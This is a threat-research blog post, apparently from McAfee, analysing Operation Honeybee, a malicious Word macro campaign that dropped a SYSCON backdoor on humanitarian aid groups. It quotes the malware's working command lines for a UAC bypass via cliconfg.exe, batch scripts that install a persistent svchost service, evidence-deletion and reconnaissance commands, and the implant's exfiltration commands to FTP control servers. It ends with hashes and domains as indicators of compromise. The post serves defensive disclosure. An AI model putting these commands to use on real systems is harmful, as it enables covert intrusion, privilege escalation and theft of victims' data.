(https://securingtomorrow.mcafee.com/)

    

# McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups

[By Ryan Sherstobito� (https://securingtomorrow.mcafee.com/author/ryan-sherstobito�/) on Mar 02, 2018](https://securingtomorrow.mcafee.com/author/ryan-sherstobitoff/)

(https://securingtomorrow.mcafee.com/2018/03/)

This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.


##### 


McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations

and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our
analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks.

Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a
tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to

entice victims into opening them.

The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.


-----

### Background

On January 15, Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor.

(https://www.securityweek.com/backdoor-uses-ftp-server-cc) The Korean-language Word document manual.doc appeared

in Vietnam on January 17, with the original author name of Honeybee.


-----

This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant

known as SYSCON, which appeared in 2017 in malicious Word documents as part of several campaigns using North

Korea–related topics. The malicious Visual Basic script uses a unique key (custom alphabet) to encode data. We have seen
this in previous operations using SYSCON. This key was also used in the Honeybee campaign and appears to have been

used since August 2017.

Examples of decoy documents.

Several additional documents surfaced between January 17 and February 3. All contain the same Visual Basic macro code

and author name as Honeybee. Some of the malicious documents were test �les without the implant. From our analysis,

most these documents were submitted from South Korea, indicating that some of the targeting was in South Korea. These

Honeybee documents did not contain any speci�c lures, rather variations of a “not compatible” message attempting to

convince the user to enable content.

We also observed a related malicious document created January 12 by the author Windows User that contained a di�erent
encoding key, but essentially used the same macro and same type of implant as we saw with the recent Honeybee

documents. This document, “International Federation of Red Cross and Red Crescent Societies – DPRK Country O�ce,”

drops an implant with the control server address 1113427185.ifastnet.org, which resolves to the same server used by the

implants dropped in the Honeybee case.


-----

The directory contents of control server 1113427185.ifastnet.org.

The directory contents of ftp.byethost11.com, from Honeybee samples.

Log �les of compromised machines from February 2018 Honeybee samples.

### MaoCheng Dropper


-----

dropper. This dropper uses a stolen digital signature from Adobe Systems. This certi�cate is also used by another Korean

language malware compiled January 16 (hash: 35904f482d37f5ce6034d6042bae207418e450f4) with an interesting

program database (PDB) path.

D:\Task\DDE Attack\MaoCheng\Release\Dropper.pdb

The malware is a Win32 executable that pretends to be a Word document based on its icon. This is a dropper for the same

type of malware as observed with the other Word documents. This sample also dropped a decoy document with the

author name Honeybee. This sample, however, contained a bug that interfered with the execution �ow of the dropper,

suggesting that the authors did not test the malware after code signing it.

The decoy document uses the cloud-based accounting software company Xero as a lure:


-----

### Possible Operator

The Advanced Threat Research team has identi�ed the following persona (snoopykiller@mail.ru) tied to this recent

operation. Based on our analysis, the actor registered two free hosting accounts: navermail.byethost3.com, which refers to

the popular South Korean search engine, and nihon.byethost11.com. The email address was used to register a free

account for a control server in all the implants described in our analysis.

### Technical Analysis

Let’s start with an overview of the attack:

We continue with the components involved in this operation.


-----

The malicious Word �le is the beginning of the infection chain and acts as a dropper for two DLL �les. The Word �le

contains malicious Visual Basic macro code that runs when the document is opened in Word using the Document_Open()
autoload function. The word �le also contains a Base64-encoded �le (encoded with a custom key) in it that is read,

decoded, and dropped to the disk by the macro.

The Document_Open() subroutine implementing the malicious functionality.

The Visual Basic macro performs the following tasks:

Opens a handle to the malicious document to read the encoded CAB �le
Decodes the CAB �le and writes it to the disk at %temp%\setup.cab


-----

Encoded CAB �le in the Word document.

Decoding and writing the CAB �le to %temp%.


-----

The decoded CAB �le in the Visual Basic memory bu�er.

The CAB �le contains the following �les and functions:

dll: A malicious DLL used to launch batch �les (used with cliconfg.exe for UAC bypass). The DLL contains the following
PDB path: D:\Task\MiMul\NTWDBLIB\Release\NTWDBLIB.pdb.
bat: A batch �le to set up the service COMSysApp, for an x64 system

bat: A batch �le to set up the service COMSysApp, for an x86 system
ini: A data �le with Base64-encoded data for connecting to an FTP server. Credentials are encoded in the .ini �le.

Decoded credential data contained in ipnet.ini.

dll: The malicious DLL �le run as a service (using svchost.exe). The DLL contains the following PDB path:
D:\Task\MiMul\FTPCom_vs10\Release\Engine.pdb.
The macro then extracts the CAB �le into %systemroo%\system32, using either wusa.exe or expand.exe (depending on

the OS) to again bypass UAC prompts
Once the �les have been extracted, the Visual Basic macro deletes the CAB �le and runs the malicious NTWDBLIB.dll via

cliconfg.exe (to gain privileges and bypass UAC protections)
Command lines used by the Visual Basic macro:

cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe
cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe

A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows.
UAC bypass via DLL hijacking requires:

A Windows executable with the auto-elevate property in its manifest

A Windows executable in a secure directory (%systemroot%\system32)

The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of

the two batch �les contained in the CAB �le (which is also dropped to %systemroot%\system32):

NTWDBLIB executing the installer batch �les under the context of cliconfg.exe.


-----

the batch �les vary depending on the OS (x64 vs x86):

#### install1.bat (x64)

@echo o�

sc stop COMSysApp
sc con�g COMSysApp type= own start= auto error= normal binpath= "%windir%\SysWOW64\svchost.exe -k COMSysApp"

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysA
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%

sc start COMSysApp
del /f /q %windir%\SysWOW64\install2.bat
del /f /q %windir%\SysWOW64\install1.bat

#### install2.bat (x86)

@echo o�
sc stop COMSysApp

sc con�g COMSysApp type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k COMSysApp"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysA
reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%

sc start COMSysApp
del /f /q %windir%\System32\install1.bat

del /f /q %windir%\System32\install2.bat

The batch �les perform these tasks:

Stop the service COMSysApp
Con�gure the service to autostart (to set up persistence on the system)
Modify registry keys to launch the DLL unser svchost.exe

Specify the malicious DLL path to be loaded into the svchost process.
Immediately restart the service

Remove the batch �les to reduce the �ngerprint on the system

IPNet.dll runs as a service under svchost.exe.

The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll

using:

cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL
All the following capabilities described are implemented by the malicious service DLL implant unless speci�ed.

#### Variant using North Korean Red Cross

Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same

Base64-decoding scheme with a di�erent custom key. This document was created January 10.


-----

Contents of the decoy document.

This variant also consists of two CAB �les that are dropped to %temp%, depending on the OS (x86 or x64).

The key di�erences in this variant:

Two CAB �les are encoded into the Word document in text boxes instead of being appended in the DOC �le
There is one CAB �le for an x86 system and another for an x64 system
This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass

exe is the program vulnerable to the UAC bypass attack
dll runs install.bat to set up the service (same as NTWDBLIB.dll)

exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS. Ipnet.dll may also be either 64-bit or 32-bit.
The Visual Basic macro uses the following command line:

cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe

The control server credential information contained in the CAB �les is di�erent:

Decoded credential data contained in another ipnet.ini.

Similarities between this variant and the original malware sample:

Service name is the same: COMSysApp
The DLL and ini �les contain the same functions as described elsewhere in this post

### Data Reconnaissance

The following information is gathered from the endpoint and sent to the control server.

System info:

Computer name
System info using: cmd /c systeminfo >%temp%\temp.ini
List of currently running process using: cmd /c tasklist >%temp%\temp.ini

### Ex�ltration


-----

the pattern:

From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt. For example, From <COMPUTER-NAME> (0104 11-40-02).txt

All the text �les are now packed into the archive temp.zip (%temp%\temp.zip)
zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt

txt is uploaded to the control server

### Additional Commands and Capabilities

The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any �les with the

keywords:

TO EVERYONE: Commands issued to all infected endpoints
TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName

The following commands are supported by the malware implant:

cmd /c pull <�lename>: Adds �lename to temp.zip, Base64 encodes, and uploads to control server
cmd /c chip <string>: Deletes current ipnet.ini con�g �le. Writes new con�g info (control server connection info) to new

ipnet.ini.
cmd /c put <new_�le_name> <existing_�le_name>: Copies existing �le to new �le name. Deletes existing �le.
/user <parameters>: Executes downloaded �le with parameters speci�ed using CreateProcessAsUser
cmd /c <command>: Executes command on infected endpoint

### Conclusion

The actor behind Honeybee has been operating with new implants since at least November 2017 with the �rst known
version of NTWDBLIB installer. Furthermore, based on the various metadata in both documents and executables, the actor

is likely a Korean speaker.

The techniques used in the malicious documents such as the lure messages closely resemble what we have observed
before in South Korea. The attacker appears to target those involved in humanitarian aid and inter-Korean a�airs. We
have seen this operation expand beyond the borders of South Korea to target Vietnam, Singapore, Argentina, Japan,

Indonesia, and Canada.

Based on the McAfee Advanced Threat Research team’s analysis, we �nd multiple components from this operation are
unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor.
Some new droppers have not been observed before in the wild. The MaoCheng dropper was apparently created

speci�cally for this operation and appeared only twice in the wild.

### Indicators of compromise

#### MITRE ATT&CK techniques

Modify existing service
Code signing

File deletion
Deobfuscate/decode �les or information
System information discovery
Process discovery
Service execution


-----

Command line Interface
Data from local system
Automated ex�ltration
Data encrypted

Commonly used port
Bypass user account control

#### Hashes

fe32d29fa16b1b71cd27b23a78ee9f6b7791b�3

f684e15dd2e84bac49ea9b89f9b2646dc32a2477
1d280a77595a2d2bbd36b9b5d958f99be20f8e06
19d9573f0b2c2100accd562cc82d57adb12a57ec
f90a2155ac492c3c2d5e1d83e384e1a734e59cc0

9b832dda912cce6b23da8abf3881fcf4d2b7ce09
f3b62fea38cb44e15984d941445d24e6b309bc7b
66d2cea01b46c3353f4339a986a97b24ed89ee18
7113aaab61cacb6086c5531a453adf82ca7e7d03
d41daba0ebfa55d0c769ccfc03dbf6a5221e006a

25f4819e7948086d46df8de2eeeaa2b9ec6eca8c
35ab747c15c20da29a14e8b46c07c0448cef4999
e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42
0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0
bca861a46d60831a3101c50f80a6d626fa99bf16

01530adb3f947fabebae5d9c04fb69f9000c3cef
4229896d61a5ad57ed5c247228606ce62c7032d0
4c7e975f95ebc47423923b855a7530af52977f57
5a6ad7a1c566204a92dd269312d1156d51e61dc4

1dc50bfcab2bc80587ac900c03e23afcbe243f64
003e21b02be3248�72cc2bfcd05bb161b6a2356
9b7c3c48bcef6330e3086de592b3223eb198744a
85e2453b37602429596c9681a8c58a5c6faf8d0c

### Domains

ftp.byethost31.com
ftp.byethost11.com
1113427185.ifastnet.org

navermail.byethost3.com
nihon.byethost3.com

 Previous Article (https://securingtomorrow.mcafee.com/consumer/mobile-security/key-mobile-threat-takeaways2018-mobile-threats-report/)

Next Article  (https://securingtomorrow.mcafee.com/mcafee-labs/hackers-bypassed-adobe-�ash-protectionmechanism/)

[ Categories: McAfee Labs (https://securingtomorrow.mcafee.com/category/mcafee-labs/)](https://securingtomorrow.mcafee.com/category/mcafee-labs/)

[ Tags:  advanced persistent threats (https://securingtomorrow.mcafee.com/tag/advanced-persistent-threats/),](https://securingtomorrow.mcafee.com/tag/advanced-persistent-threats/)
[cybersecurity (https://securingtomorrow.mcafee.com/tag/cybersecurity/), malware](https://securingtomorrow.mcafee.com/tag/cybersecurity/)
[(https://securingtomorrow.mcafee.com/tag/malware/), Phishing (https://securingtomorrow.mcafee.com/tag/phishing/)](https://securingtomorrow.mcafee.com/tag/phishing/)


-----

Facebook Comments (0) Comments (0) G+ Comments

## Newsletter Sign Up

First Name *

Last Name *

Email Address *

Country *

--Please Select-
## McAfee on Twitter

[ Follow us on Twitter (https://twitter.com/McAfee)](https://twitter.com/McAfee)


Submit


[mcafee_labs (https://www.twitter.com/mcafee_labs)](https://www.twitter.com/mcafee_labs)

[Lazarus is using a never-before-seen tactic to get ahold of #Bitcoin (https://twitter.com/#search?q=Bitcoin)](https://twitter.com/#search?q=Bitcoin)

[wallets. More on the campaign— #HaoBao (https://twitter.com/#search?q=HaoBao). https://t.co/CbCd3wiSvk](https://twitter.com/#search?q=HaoBao)
(https://t.co/CbCd3wiSvk)

20 hours ago (2018/03/03 08:00:05)
[Reply (https://twitter.com/intent/tweet?in_reply_to=969844847157895169) · Retweet (https://twitter.com/intent/retweet?](https://twitter.com/intent/tweet?in_reply_to=969844847157895169)
[tweet_id=969844847157895169) · Favorite (https://twitter.com/intent/favorite?tweet_id=969844847157895169)](https://twitter.com/intent/favorite?tweet_id=969844847157895169)

[mcafee_labs (https://www.twitter.com/mcafee_labs)](https://www.twitter.com/mcafee_labs)

Operation Honeybee, a campaign leveraging a new variant of the #SYSCON (https://twitter.com/#search?
[q=SYSCON) backdoor, is targeting humanitarian aid orga… https://t.co/zmYq0mJ6Xp (https://t.co/zmYq0mJ6Xp)](https://t.co/zmYq0mJ6Xp)

1 day ago (2018/03/02 23:30:06)
[Reply (https://twitter.com/intent/tweet?in_reply_to=969716507621167104) · Retweet (https://twitter.com/intent/retweet?](https://twitter.com/intent/tweet?in_reply_to=969716507621167104)
[tweet_id=969716507621167104) · Favorite (https://twitter.com/intent/favorite?tweet_id=969716507621167104)](https://twitter.com/intent/favorite?tweet_id=969716507621167104)


-----

Attackers always look to bypass new protection mechanisms. More on how #hackers
[(https://twitter.com/#search?q=hackers) exploited an #Adobe (https://twitter.com/#search?q=Adobe) Flash](https://twitter.com/#search?q=Adobe)
[vulnerabi… https://t.co/Hf473GQneD (https://t.co/Hf473GQneD)](https://t.co/Hf473GQneD)

1 day ago (2018/03/02 20:05:34)
[Reply (https://twitter.com/intent/tweet?in_reply_to=969665033314684929) · Retweet (https://twitter.com/intent/retweet?](https://twitter.com/intent/tweet?in_reply_to=969665033314684929)
[tweet_id=969665033314684929) · Favorite (https://twitter.com/intent/favorite?tweet_id=969665033314684929)](https://twitter.com/intent/favorite?tweet_id=969665033314684929)

## Next Article

(https://securingtomorrow.mcafee.com/mcafee-labs/hackers-bypassed-adobe-�ash-protection-mechanism/)

[McAfee Labs (https://securingtomorrow.mcafee.com/category/mcafee-labs/)](https://securingtomorrow.mcafee.com/category/mcafee-labs/)

How Hackers Bypassed an Adobe Flash Protection Mechanism

[About (https://www.mcafee.com/us/about-us.aspx) | Subscribe (/feed/)](https://www.mcafee.com/us/about-us.aspx)

[| Contact & Media Requests (https://www.mcafee.com/us/about/contact-us.aspx#ht=tab-publicrelations)](https://www.mcafee.com/us/about/contact-us.aspx#ht=tab-publicrelations)

[| Privacy Policy (https://www.mcafee.com/common/privacy/english/index.htm) | Legal (https://www.mcafee.com/us/about/legal/legal-notices.aspx)](https://www.mcafee.com/common/privacy/english/index.htm)

© 2018 McAfee LLC

    

(https://twitter.com/McAfee)(https://www.facebook.com/McAf(https://www.linkedin.com(https://www.youtu(https://plus


(https://securingtomorrow.mcafee.com/mcafee-labs/hackers-bypassed-adobe-�ash-protection-mechanism/)

[McAfee Labs (https://securingtomorrow.mcafee.com/category/mcafee-labs/)](https://securingtomorrow.mcafee.com/category/mcafee-labs/)

How Hackers Bypassed an Adobe Flash Protection Mechanism


-----